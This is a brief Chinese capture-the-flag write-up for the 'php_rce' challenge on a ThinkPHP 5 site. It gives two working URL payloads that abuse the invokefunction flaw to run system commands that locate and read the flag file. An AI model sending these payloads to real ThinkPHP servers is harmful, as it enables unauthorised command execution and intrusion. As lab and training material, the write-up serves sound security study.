攻防世界(进阶)--WEB--9.php_rce

考察点：rce框架漏洞

1.进入场景，ThinkPHP框架，版本为5.1

2.查找字符串：flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

3.查看flag

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag